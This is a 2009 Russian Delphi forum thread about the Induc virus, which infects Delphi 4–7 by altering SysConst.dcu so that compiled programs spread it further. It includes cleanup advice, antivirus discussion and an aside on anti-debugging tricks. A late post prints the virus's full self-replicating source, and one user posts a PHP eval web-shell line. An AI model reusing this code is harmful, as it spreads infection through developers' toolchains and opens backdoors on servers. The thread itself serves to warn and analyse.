Осторожно! Новый вирус, специфичный для Delphi

← →
Григорьев Антон © (2009-08-12 20:37) [0]

В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса - это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске - это убережёт систему от повторного заражения.

Кому интересны подробности, могут познакомиться с ними здесь: http://www.delphikingdom.com/asp/answer.asp?IDAnswer=70912

← →
Игорь Шевченко © (2009-08-12 21:11) [1]

Старая версия сохраняется в том же каталоге, что и dcu ? (Lib и Lib\Debug) ?

← →
Григорьев Антон © (2009-08-12 21:19) [2]

> Игорь Шевченко © (12.08.09 21:11) [1]
> Старая версия сохраняется в том же каталоге, что и dcu ?
> (Lib и Lib\Debug) ?

Да. В коде вируса так и написано:
MoveFile(pchar(d+"bak"),pchar(d+"dcu"));

← →
Игорь Шевченко © (2009-08-12 21:32) [3]

Григорьев Антон © (12.08.09 21:19) [2]

Я к тому, чтобы по всем диску не искать. В каталоге turbo delphi 2006 не нашел. Кроме того, почти все мои проекты собираются с run-time пакетами

← →
Художник (2009-08-12 21:41) [4]

мда уж... уже и только что скомпилированным собственным прогам доверять нельзя. :(
Нашел и у себя этот долбанный SysConst.bak. Что характерно не ставил я эту версию qip. А значит эта вирусня уже активно ползает по инету и запросто может мутировать во что-либо более опасное.

← →
DVM © (2009-08-12 21:42) [5]

> Художник

Отошли найденное касперскому, доктору вебу и в ESET

← →
Григорьев Антон © (2009-08-12 21:45) [6]

> Игорь Шевченко © (12.08.09 21:32) [3]
> Я к тому, чтобы по всем диску не искать. В каталоге turbo
> delphi 2006 не нашел. Кроме того, почти все мои проекты
> собираются с run-time пакетами

Забыл сказать: заражаются только версии Delphi с 4 по 7.

← →
Художник (2009-08-12 21:49) [7]

> Отошли найденное касперскому, доктору вебу и в ESET

А толку? раз пошел такой класс вирусов, что позарились на генофонд среды разработки приложений, это даже пофиг какой язык программирования. А значит отныне собирать проекты придется только на голой системе, скажем под вирт. машиной (

← →
KilkennyCat © (2009-08-12 21:51) [8]

> отныне собирать проекты придется только на голой системе

Отныне?! Да это уже сто лет как делать надо...

← →
DVM © (2009-08-12 21:57) [9]

> Художник

> А толку?

Толк определенный будет.

← →
Kerk © (2009-08-12 22:00) [10]

Давным давно далеко далеко в галактике уже бывали вирусы, которые заражали турбо паскаль и турбо си :))

← →
TUser © (2009-08-12 22:01) [11]

D7 + QIP

чисто

А у вирмейкеров появился телепатор, я давно думал - почему нет вирусов, заражающихся через исправление исходников стандартных библиотек. Тут почти тоже.

← →
Piter © (2009-08-12 22:15) [12]

QiP вообще скурвился... Стоит только зайти на его домашнюю страничку... ППЦ...

← →
Piter © (2009-08-12 22:16) [13]

TUser © (12.08.09 22:01) [11]
D7 + QIP
чисто

ну давайте теперь тут будем отписываться все те, кто не заразился )))

← →
DVM © (2009-08-12 22:17) [14]

> Piter © (12.08.09 22:15) [12]
>
> QiP вообще скурвился... Стоит только зайти на его домашнюю
> страничку... ППЦ...

http://habrahabr.ru/blogs/im/66209/

все не так просто

← →
antonn © (2009-08-12 22:47) [15]

прикольно, наконец-то кто то догадался :)

← →
xayam © (2009-08-12 22:57) [16]

меня вообще удивляет почему вирусы часто так избирательно действуют на старые версии программного обеспечения. Складывается нехорошее впечатление, будто заказчики этого вируса сами создатели delph"ей . А чтобы новое покупали/использовали. Выгодно в первую очередь им же. Или это я перебарщиваю?

← →
KilkennyCat © (2009-08-12 22:59) [17]

не перебарщиваешь (ну и словечко),на 80% соглашусь.

← →
antonn © (2009-08-12 22:59) [18]

вероятно юзеров старого ПО больше, чем нового :)
я вот юзаю старую добрую 6 и 7 :)

← →
DVM © (2009-08-12 23:01) [19]

> xayam ©

> Складывается нехорошее впечатление, будто заказчики этого
> вируса сами создатели delph"ей

Программистов таким детским садом меньше всего пожалуй напугать можно и тем более спровоцировать на переход на новые версии.

← →
xayam © (2009-08-12 23:09) [20]

> DVM © (12.08.09 23:01) [19]
> Программистов таким детским садом меньше всего пожалуй напугать
> можно и тем более спровоцировать на переход на новые версии.

не такой уж детский сад, не будет .bak"а в следующей версии вируса, не будет ошибки с реестром и что ты будешь делать? Как вообще узнаешь о его существовании? Устанавливать для этого тяжеловесные антивирусы? Не факт, что найдет, если изменится сигнатура. Не факт, что корректно вылечит.

← →
AlexDan © (2009-08-12 23:20) [21]

> TUser © (12.08.09 22:01) [11]
> D7 + QIP
> чисто
D7 + QIP - есть такая зараза..(
sysconst.bak имеется..

← →
Холивар (2009-08-12 23:24) [22]

>
> Григорьев Антон © (12.08.09 20:37)

Не пользуйтесь qip, пользуйтесь skype

← →
DVM © (2009-08-12 23:24) [23]

> не такой уж детский сад, не будет .bak"а в следующей версии
> вируса, не будет ошибки с реестром и что ты будешь делать?
>

Ясен пень, пойду куплю очередную версию Delphi :)

← →
KilkennyCat © (2009-08-12 23:24) [24]

> DVM © (12.08.09 23:01) [19]

смотря что считать "программистом"

← →
имя (2009-08-12 23:25) [25]

Удалено модератором

← →
xayam © (2009-08-12 23:32) [26]

> Холивар (12.08.09 23:24) [22]
> Не пользуйтесь qip, пользуйтесь skype

нашел че советовать. Закрытый протокол, отличная возможность для скрытого распространения вирусов!

> DVM © (12.08.09 23:24) [23]
> Ясен пень, пойду куплю очередную версию Delphi :)

ни фига не смешно. Противно, что такие методы в ходу у вроде бы цивилизованных людей. А как тут думать прикажете? Delphi 2006 тоже же мог бы заразить, ан не хочет. Откуда ноги растут? Я думаю понятно. Как с этим бороться? Переходить на php :)

← →
Холивар (2009-08-12 23:35) [27]

>>xayam © (12.08.09 23:32) [26]
> Холивар (12.08.09 23:24) [22]
> Не пользуйтесь qip, пользуйтесь skype
>>нашел че советовать. Закрытый протокол, отличная возможность для скрытого распространения вирусов!

Windows тоже закрытая система - тогда ставьте открытый Linux+Wine.

← →
DVM © (2009-08-12 23:37) [28]

> Delphi 2006 тоже же мог бы заразить, ан не хочет. Откуда
> ноги растут? Я думаю понятно

Эмбаркадеро вроде бы D7 продает все еще.

← →
xayam © (2009-08-12 23:45) [29]

> DVM © (12.08.09 23:37) [28]
> > Delphi 2006 тоже же мог бы заразить, ан не хочет. Откуда
> > ноги растут? Я думаю понятно
> Эмбаркадеро вроде бы D7 продает все еще.

не думаю что им выгодны высокие продажи этой версии при наличии версии для unicode

> Холивар
> Windows тоже закрытая система - тогда ставьте открытый Linux+Wine.

Ну я бы не сравнивал Microsoft с Skype. И соглашусь на счет skyp"а с мнением специалиста по безопасности http://www.xakep.ru/post/38543/default.asp

← →
DVM © (2009-08-12 23:49) [30]

> xayam ©

> не думаю что им выгодны высокие продажи этой версии при
> наличии версии для unicode

Им выгодны любые продажи чего угодно. Это же продажи!
Продажа D7 даже в перспективе более выгодна, т.к. продают устаревшую версию ПО - раз, подсаживают на средство разработки - два, тем самым повышая вероятность приобретения в будущем новой версии.

← →
RWolf © (2009-08-13 00:03) [31]

В моей VCS эта зараза сидит уже месяц. Это печально.
Будем чистить.
Посоветуйте простую утилитку для контроля изменений в указанных юзером файлах/каталогах (на случай, если идею будут творчески развивать).

← →
xayam © (2009-08-13 00:06) [32]

> DVM © (12.08.09 23:49) [30]
> Им выгодны любые продажи чего угодно. Это же продажи!
> Продажа D7 даже в перспективе более выгодна, т.к. продают
> устаревшую версию ПО - раз, подсаживают на средство разработки
> - два, тем самым повышая вероятность приобретения в будущем
> новой версии.

ну может быть, спорить не буду, это чисто мое имхо.

← →
Rouse_ © (2009-08-13 00:10) [33]

> xayam © (12.08.09 23:45) [29]

Не нужно разводить панику :) Защита скайпа достаточно примитивна и подход очень стандартен для более менее желающего казаться защищенным приложения, ты бы посмотрел какие трюки выкидывают реально защищенные программы, старфорс тот-же как пример :) Ну или например несколько наших продуктов используют прямые вызовы sysenter/int2e в обзод кернела и нтдлл (что само по себе достаточно чревато в руках непонимающего что он творит программиста), применяет недокументированные аналоги опкодов (ну например вместо опкода int3 выглядящего как CCh можно использовать байткод CDh,03h), те-же call в середину инструкций, запутывающие анализатор дизассемблера, контроль DR регистров для определения факта отладки, рассчет энтропии шифрованных секций кода для определения факта распаковки части программы. Всего этого в скайпе нет, а сама сабжовая статья рассчитана на начинающих школяров и не несет абсолютно никакой конкретики :)

← →
DVM © (2009-08-13 00:14) [34]

> Rouse_ ©

> у или например несколько наших продуктов используют прямые
> вызовы sysenter/int2e в обзод кернела и нтдлл (что само
> по себе достаточно чревато в руках непонимающего что он
> творит программиста), применяет недокументированные аналоги
> опкодов ...

Неужели ваше ПО нуждается в такой страшной защите? Это оправдано?

← →
antonn © (2009-08-13 00:14) [35]

по сабжу - пока забрал права у всех на изменение, удаление, создание файлов в каталоге дельфи, по идее не должен сдохнуть от такого :)

← →
Rouse_ © (2009-08-13 00:14) [36]

> Неужели ваше ПО нуждается в такой страшной защите? Это оправдано?

Да, нуждается, да оправдано :)

← →
xayam © (2009-08-13 00:24) [37]

> Rouse_ © (13.08.09 00:10) [33]
> ...Всего этого в скайпе нет, а сама сабжовая
> статья рассчитана на начинающих школяров и не несет абсолютно
> никакой конкретики :)

Заключение Заканчивая статью, я хотел бы спросить: что же все-таки скрывают создатели Skype в недрах своего кода? Почему, распространяя программу бесплатно, они зажимают исходные тексты и используют закрытый протокол, вызывая тем самым недоверие специалистов по безопасности? Для чего бесплатной программе столь навороченная защита, снижающая производительность и потребляющая большое количество памяти, ведь ломать ее никто не собирается? Почему вообще Skype-клиент реализован как черный ящик? Вопросы риторические. Но чует мой хвост, неспроста все это!
допустим конкретика есть, но нет так нет. Меня просто, как и автора статьи удивляет сочетание бесплатность программы/закрытый протокол, все эти противоотладочные действия и т.д. Неужели нас только двое?

> Rouse_ © (13.08.09 00:14) [36]
> > Неужели ваше ПО нуждается в такой страшной защите? Это
> оправдано?
> Да, нуждается, да оправдано :)

а Вы, что разрабатываете? Если не секрет :)

← →
Ega23 © (2009-08-13 00:25) [38]

> Как с этим бороться? Переходить на php :)

На этом месте аж подавился макаронами... :)

← →
DVM © (2009-08-13 00:26) [39]

> Ega23 ©

> На этом месте аж подавился макаронами... :)

по ночам макароны ешь?

← →
xayam © (2009-08-13 00:28) [40]

> Ega23 © (13.08.09 00:25) [38]
> > Как с этим бороться? Переходить на php :)
> На этом месте аж подавился макаронами... :)

:) ну не надо так прям реагировать. Delphi for php благо на подходе, надеюсь доведут до ума :)

← →
Ega23 © (2009-08-13 00:31) [41]

> Меня просто, как и автора статьи удивляет сочетание бесплатность
> программы/закрытый протокол

А, собственно, почему это удивляет?
Ну вот например. Я разработал 3Д-движок (а-ля Контра). На базе данного движка я сделал игу и выложил её в сеть. Народ на неё подсел (да и движок оказался хорошим).
Я бесплатно распространяю игру, но я же не должен бесплатно распространять движок. Я его продаю всем желающим (за нефиговые деньги).

← →
Ega23 © (2009-08-13 00:32) [42]

> по ночам макароны ешь?

Типа, запоздалый ужин

← →
xayam © (2009-08-13 00:38) [43]

> Ega23 © (13.08.09 00:31) [41]
> А, собственно, почему это удивляет?
> Ну вот например. Я разработал 3Д-движок (а-ля Контра). На
> базе данного движка я сделал игу и выложил её в сеть. Народ
> на неё подсел (да и движок оказался хорошим).
> Я бесплатно распространяю игру, но я же не должен бесплатно
> распространять движок. Я его продаю всем желающим (за нефиговые
> деньги).

не тот случай, протокол они же не продадут, пока не изменят идеологию своего продукта.

← →
Ega23 © (2009-08-13 00:45) [44]

> не тот случай, протокол они же не продадут

Ты ещё очень молод. Когда я в "Дедале" работал, у нас протокол обмена данными был запатентован (номер патента сейчас не скажу, но если сильно надо - через старые связи справки наведу. Обращаться в частном порядке).
Было это связано с какой-то "политической" подковёрной борьбой, когда (на тот момент) мы были дочерним предприятием и головное требовало от нас открыть исходники, дабы свой продукт с нашей системой со своей стороны интегрировать.
А это - бабло. Очень большое бабло. Такое бабло, что лично мне бы хватило до конца жизни (да и внукам бы осталось).

← →
Кто б сомневался © (2009-08-13 00:47) [45]

А че вирус то делает? Высылает логи клавы и пароли и данные кред. карты? форматирует диск? Отсылает мои секретные документы?
Что?
Или это просто показуха вирмейкера?

← →
Кто б сомневался © (2009-08-13 00:48) [46]

Кстати, этому вирусу уже месяцев 5.

← →
xayam © (2009-08-13 00:58) [47]

> Ega23 © (13.08.09 00:45) [44]
> Ты ещё очень молод.

может быть, может быть через десять лет я стану еще моложе. Может быть наконец надо начать задумываться не только о собственной выгоде, а об общем деле, если таковое имеется, а если нет, то может быть есть смысл поискать. Но не мне конечно Вас наставлять, просто часто непонятно что люди пытаются скрыть, ведь "тайное рано или поздно станет явным", так не проще ли сразу начинать свою деятельность с чистого листа или это уже нормой стало и ничего не поделаешь с этим. Это засело в наших умах настолько глубоко, что кажется уже ничего не проймет. Или это мне только снится и, как сказал Дэвид Айк, реальность всего лишь иллюзия :)

← →
Дмитрий Белькевич (2009-08-13 01:11) [48]

> http://habrahabr.ru/blogs/im/66209/

1. Нет, я конечно понимаю, все кушать хотят. Но зачем менять без ведома поисковики/странички? Ну хоть бы отключаемую фичу сделали.
2. Я не думаю, что проект потребляет такие уж запредельные ресурсы, которые нельзя было бы покрыть посещаемостью и рекламой на сайте.

Ну а если проект действительно материально несостоятелен - то пускай продают бренд.

Короче резюме: квип окончательно скурвился. Есть ли для того причины меня, как юзера, мало волнуют. Я уж лучше на обычной аське сидеть буду (благо что реклама запросто закрывается).

← →
Дмитрий С © (2009-08-13 04:15) [49]

А я както делал трояна для PHP :) чтото вроде того:
@eval($_POST(md5(-1)));

← →
brother © (2009-08-13 07:49) [50]

блин, словил(

← →
Ega23 © (2009-08-13 07:51) [51]

> Может быть наконец надо начать задумываться не только о
> собственной выгоде, а об общем деле

Нету никакого общего дела. Нету.
И выгода есть всегда. Абсолютно всегда. Даже если ты написал какую-то супер-пупер штуку, выложил её со всеми исходниками - выгода есть. Разрабатывая её ты получил level up. Соответственно, потом ты сможешь "предложить себя" работодателю за более крупные деньги.
Всегда есть выгода.
А песни о "духовности", "всеобщем деле", "Вселенском знании" и т.п. очень быстро пропадут, когда ребёнок попросит игрушку ему купить. А у тебя денег нет, т.к. ты "общим делом" занимаешься.
Спустись с небес на землю, жизнь штука сложная.

← →
Григорьев Антон © (2009-08-13 08:48) [52]

> Кто б сомневался © (13.08.09 00:47) [45]
> А че вирус то делает?

По ссылке в [0] есть код этого вируса на Delphi. Все желающие могут самостоятельно разобраться, что он делает.

← →
oxffff © (2009-08-13 09:08) [53]

> Rouse_ © (13.08.09 00:10) [33]
>
> > xayam © (12.08.09 23:45) [29]
>
> Не нужно разводить панику :) Защита скайпа достаточно примитивна
> и подход очень стандартен для более менее желающего казаться
> защищенным приложения, ты бы посмотрел какие трюки выкидывают
> реально защищенные программы, старфорс тот-же как пример
> :) Ну или например несколько наших продуктов используют
> прямые вызовы sysenter/int2e в обзод кернела и нтдлл (что
> само по себе достаточно чревато в руках непонимающего что
> он творит программиста), применяет недокументированные аналоги
> опкодов (ну например вместо опкода int3 выглядящего как
> CCh можно использовать байткод CDh,03h), те-же call в середину
> инструкций, запутывающие анализатор дизассемблера, контроль
> DR регистров для определения факта отладки, рассчет энтропии
> шифрованных секций кода для определения факта распаковки
> части программы.

Еще есть трюки с

#UD Invalid Opcode (Undefined Opcode)
Fault No UD2 instruction or reserved
opcode

P.S. Но на wasm есть соответствующие статьи противодействия. :)

← →
Anatoly Podgoretsky © (2009-08-13 09:34) [54]

> antonn (13.08.2009 00:14:35) [35]

Как же ты сам то работаешь?

← →
Rouse_ © (2009-08-13 09:36) [55]

> xayam © (13.08.09 00:24) [37]
> а Вы, что разрабатываете? Если не секрет :)

Сметное ПО, но дорогое, поэтому массовое пользование неликвидной версии данного ПО для нас будет не рентабельно. Приходится изобретать :)

> oxffff © (13.08.09 09:08) [53]

Ну ты же сам понимаешь что на каждый такой трюк есть контртрюк, для которого тоже найдется контр и далее-далее :) Выиграет в итоге тот, кто менее ленив и более усидчив :)
(а вообще параною тут поймать можно на раз) :))

← →
Anatoly Podgoretsky © (2009-08-13 09:46) [56]

> Ega23 (13.08.2009 00:45:44) [44]

> Ты ещё очень молод.

Он исправится.

← →
Anatoly Podgoretsky © (2009-08-13 09:54) [57]

> xayam (12.08.2009 23:45:29) [29]

С тех пор появились новые факты.
В одно время сразу после включения скайпа начиналась некоторая очень подозрительная активность, попытки сотен соединений на порт 443, при выключение активность прекращается. Такое продолжалось пару недель, после активность пришла в норму.
Скайп был на ХР, файрвол на Линуксе, пробиться все равно у них не было надежды.

← →
antonn © (2009-08-13 10:21) [58]

>
> Как же ты сам то работаешь?

молча :)
права на чтение каталогов и файлов остались, этого хватает, а на папку project я не сбрасывал прав

← →
Полиграф Полиграфович (2009-08-13 10:26) [59]

А можно первый пост перевести на английский, если кому не сложно.

← →
RWolf © (2009-08-13 12:10) [60]

> А можно первый пост перевести на английский, если кому не
> сложно.

A new virus infects Delphi installations.
Infected program searches for installed versions of Delphi and modifies SysConst.dcu in each of them; old version is saved as SysConst.bak.
After infection all Delphi projects compiled on this computer start infecting Delphi at every computer they are launched on. The virus does not cause any harm except “Runtime error 3” exception which appears when infected program is launched if registry key HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x =4–7) contains wrong RootDir value.

Check your Delphi versions and if you find SysConst.bak then do the following:
1. Remove SysConst.dcu
2. Copy SysConst.bak to SysConst.dcu. The remaining SysConst.bak keeps system from repeated infections.

← →
Григорьев Антон © (2009-08-13 15:59) [61]

Вот ещё два интересных поста по теме:
http://gunsmoker.blogspot.com/2009/08/delphi-delphi.html
http://habrahabr.ru/blogs/virus/66937/

← →
Andy BitOff © (2009-08-13 16:27) [62]

Мне больше всего понравилось это:
http://forum.cheatengine.org/viewtopic.php?t=416093&sid=d687c80980b69695658c403c0a65cbc5
Датированное, кстати, Apr 21, 2009

← →
TIF © (2009-08-13 17:38) [63]

> Забыл сказать: заражаются только версии Delphi с 4 по 7.

Ещё один плюс к моему мнению, что по жизни надо идти в ногу со временем )

← →
Пит (2009-08-13 18:34) [64]

> Rouse_ © (13.08.09 00:10) [33]

то есть, ваш основной продукт работает исключительно под правами администратора. И вызвано это только необходимостью защиты?

> [55] Rouse_ © (13.08.09 09:36)

> Сметное ПО, но дорогое, поэтому массовое пользование неликвидной
> версии данного ПО для нас будет не рентабельно. Приходится
> изобретать :)

а не рассматривали вариант онлайн-версии, по примеру гугла? вроде бы браузера вполне должно хватить для реализации UI такого рода софта.

> Пит (13.08.09 18:34) [64]
> то есть, ваш основной продукт работает исключительно под
> правами администратора.

Чем вызван столь сумбурный вывод?

> Eraser © (13.08.09 19:29) [65]
> а не рассматривали вариант онлайн-версии

Зачем, если есть полноценный триал?

> вроде бы браузера вполне должно хватить для реализации UI
> такого рода софта.

Увы, врятли...

> [67] Rouse_ © (13.08.09 22:35)

> Зачем, если есть полноценный триал?

так взломают же, особенно если кто-нибудь задастся целью и выделит на это деньги. а с web-версией и взламывать то нечего.
ну я не в курсе специфики софта, просто если есть возможность сделать онлайн версию, то почему бы и нет? раз вопрос защиты поставлен на столько серьезно. или хотя бы часть логики вынести на сервер.

Eraser © (13.08.09 22:45) [68]

> ну я не в курсе специфики софта, просто если есть возможность
> сделать онлайн версию, то почему бы и нет? раз вопрос защиты
> поставлен на столько серьезно

Вот у MS-овских продуктов тоже вроде не абы как вопрос о защите поставлен (я имею в виду активацию), однако ж ломают. И онлайн версии они не делают.

> однако ж ломают

Слишком большое количество заинтересованных. Не думаю, что сметная программа столь популярна.

> [69] Игорь Шевченко © (13.08.09 23:07)

> И онлайн версии они не делают.

пока что не делают )

ну а вообще разве сравнить ОС и программу для работы с документацией и бухгалтерией, какой бы сложной она не была.

> И онлайн версии они не делают.

А вот это уже устаревшая информация :)

Microsoft продемонстрировала Office 2010
http://microsoft.com/rus/news/issues/2009/07/Office_2010.mspx

Корпорация также анонсировала три варианта доступности веб-приложений Office. Более 400 миллионов пользователей получат бесплатный доступ к новому сервису через Windows Live. Более 90 миллионов корпоративных клиентов смогут воспользоваться сервисом в рамках программ приобретения Office в рассрочку либо по годовой подписке. Кроме того, сервис будет доступен через веб-сайт Microsoft Online Services, где можно будет приобрести подписку на услугу.

Office "уходит в облака". Скорее весго онлайн-версия будет располагаться на домене office.com, который Microsoft на днях выкупила (сумма сделки скрывается)

Eraser © (13.08.09 23:26) [71]

> ну а вообще разве сравнить ОС и программу для работы с документацией
> и бухгалтерией, какой бы сложной она не была.

а речь не только об ОС, активация и в офисе была.

По сабжу - баян, давно уже были такие вирусы, которые залазили в системные юниты, в sysconst в частности.

Да — Касперский уже ловит сабж.

DrWeb уж дня три как ловит :)

странно, у меня был этот вирус, вроде сделал всё по инструкции, но eset теперь ругается на win32/delf.oqx и удаляет любой скомпиленный exe

это уже нечто другое или как?

> это уже нечто другое или как?

Это другое, видать последователи появились у вируса. Тот в ESET был WIN32/Induc.A

> это уже нечто другое или как?

погуглить не ё?
с касперского:
26 сентября 2008 Trojan-Downloader.Win32.Delf.oqz 12:09 15:38 Trojan-Downloader.Win32.Delf.oqy 12:08 15:38 Trojan-Downloader. Win32 >.< Delf >.< oqx 12:08 15:38
старье...и явно не к делфи)

xayam © (13.08.09 0:24) [37]
допустим конкретика есть, но нет так нет. Меня просто, как и автора статьи удивляет сочетание бесплатность программы/закрытый протокол, все эти противоотладочные действия и т.д. Неужели нас только двое?
По-моему, закономерно. Главное - конкурентов не будет (в отличие от аськи). Ну и мне кажется, что защита от вирусов тоже повышается.

Ega23 © (13.08.09 0:31) [41]
Ну вот например. Я разработал 3Д-движок (а-ля Контра). На базе данного движка я сделал игу и выложил её в сеть. Народ на неё подсел (да и движок оказался хорошим).
А че за игра?

> Это другое, видать последователи появились у вируса. Тот
> в ESET был WIN32/Induc.A

Да, выдавало как Induc.A, после замены sysconst по инструкции стало ругаться на delf.oqx на все скомпиленные exe.

Меня интересует как это лечить, чтоб работать в делфи дальше.

каспер на эти exe не ругается, но 15 из 41 антивирусов с virustotal.com - ругаются, часть из них пишут Heuristic.LooksLike.Win32.Banload.I Trojan/Downloader.Banload.aedv Trojan-Downloader/W32.Banload.370176.H

но когда читаю про эти трояны - не нахожу у себя их модулей..
может такое быть что после "лечения" от Induc.A случилось так что exe из delphi стали похои на данного трояна... или всё же у меня наверняка что-то есть злое???

решил проблему тем, что стянул Lib с другого компа, пока никто не ругается

> или всё же у меня наверняка что-то есть злое???

Можно отправить на исследование в ЛК. IMHO, скорее всего ничего не найдут :) Так и ответят

Нет, я конечно Лабораторию Касперского люблю и уважаю, но на это без боли смотреть не могу:
Как видно, вирус внедряет своей код в файл с расширением dcu — "in dcu". Переставив пару букв местами мы и получаем название, которое нас вполне устроило — Induc.
http://www.securelist.com/ru/weblog/39134/Istoriya_Indyuka

Логика %-))) Боже мой...

ну так вирусов миллион, всем имена придумывать — фантазии не напасешься.

> [85] TIF © (27.08.09 15:49)
> dcu — "in dcu". Переставив пару букв местами мы и получаем
> название, которое нас вполне устроило — Induc.
>
> Логика %-))) Боже мой...

На так, наведённый типа.

Правильное его имя - интроспективный вирус, IMHO.

Подобной задачкой (правда, без самого паровоза) грузили студентов
не одного поколения. Я первый раз узнал формулировку из хорошей книги
Чарльз Уэзерелл "Этюды для программистов", ЕМНИП.

http://groups.google.com/group/fido7.ru.delphi/browse_thread/thread/727ccc94c2b781d8/9429cab1321636b

Часто обсуждалась в ru.algorithm для разнообразнейших языков,
был и сайт, посвященный оной задаче.

Почему повезло именно дельфи - хз, видимо, для обучения
была широко распространена. А в окружаюшую среду попал, когда,
видимо, начались более серьезные поделки. Вряд ли инфицированный
продукт был средством разработки, скорее игрушка, или тулза, способная
заинтересовать дельферов даже в виде экзешника, не думаю, что
много дельферов обменивались system.dcu.

Смотрю сейчас на оный код и меня терзают смутные сомнения, что
это не дельфер писал, ну, или, не привыкший к дельфи, или часто
скакавший между языками. А уж ошибка в экранировании $
просто смешная, чего ж даже без отладки писалось.
Хотя, возможно, что был найден подходящий по размеру пример
и к нему на коленке вставили зубы.

Пойду еще поразмышляю.

--
Regards, LVT.

Приведу, что ли код, чтоб кому интересно, смотрел здесь.
uses windows; var sc:array[1..24] of string=("uses windows; var sc:array[1..24] of string=(", "function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]", "=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;", "h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begi n", "h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle", "(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile", "(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while", "not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0", "then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2", ",$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,", "x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$", ")); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.", "wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,", "f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),", "pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,", "0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=", "CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,", "@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of", "char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(", "HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then", "begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=", "1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+", "$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;", "begin st; end."); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+"bak"),0,0,0,3,0,0); if h<>DWORD(-1) then begin CloseHandle(h); exit; end; {"I-}assignfile(f1,s); reset(f1); if ioresult<>0 then exit; assignfile(f2,d+"pas"); rewrite(f2); if ioresult<>0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos("implementation",s)<>0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,""""+sc[h],""","); writeln(f2,""""+sc[24]+""");"); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); {"I+}MoveFile(pchar(d+"dcu"),pchar(d+"bak")); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+"""+d+"pas""),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+"bak"),pchar(d+"dcu")); DeleteFile(pchar(d+"pas")); h := CreateFile(pchar(d+"bak"),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+"dcu"),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY; c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:="4" to "7" do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar("Software\Borland\Delphi\"+v+".0"),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,"RootDir",nil,@i,@c,@i)=0 then begin r:=""; i:=1; while c[i]<>#0 do begin r:=r+c[i]; inc(i); end; re(r+"\source\rtl\sys\SysConst"+".pas",r+"\lib\sysconst.","""+r+"\bin\dcc32.exe" "); end; RegCloseKey(k); end; end; begin st; end.

Форматировал не я, видимо, GunSmoker.

> Leonid Troyanovsky © (27.08.09 20:01) [89]

Блин, никто даже не отзовется. Чего, меня одного заботы одолели?
Вот оно - Прочее, давайте обсудим.
Дык, по всем, кто трудится в эхотаге уже каток проехал.

Ясное ж дело, что дельфи здесь по воле случая.
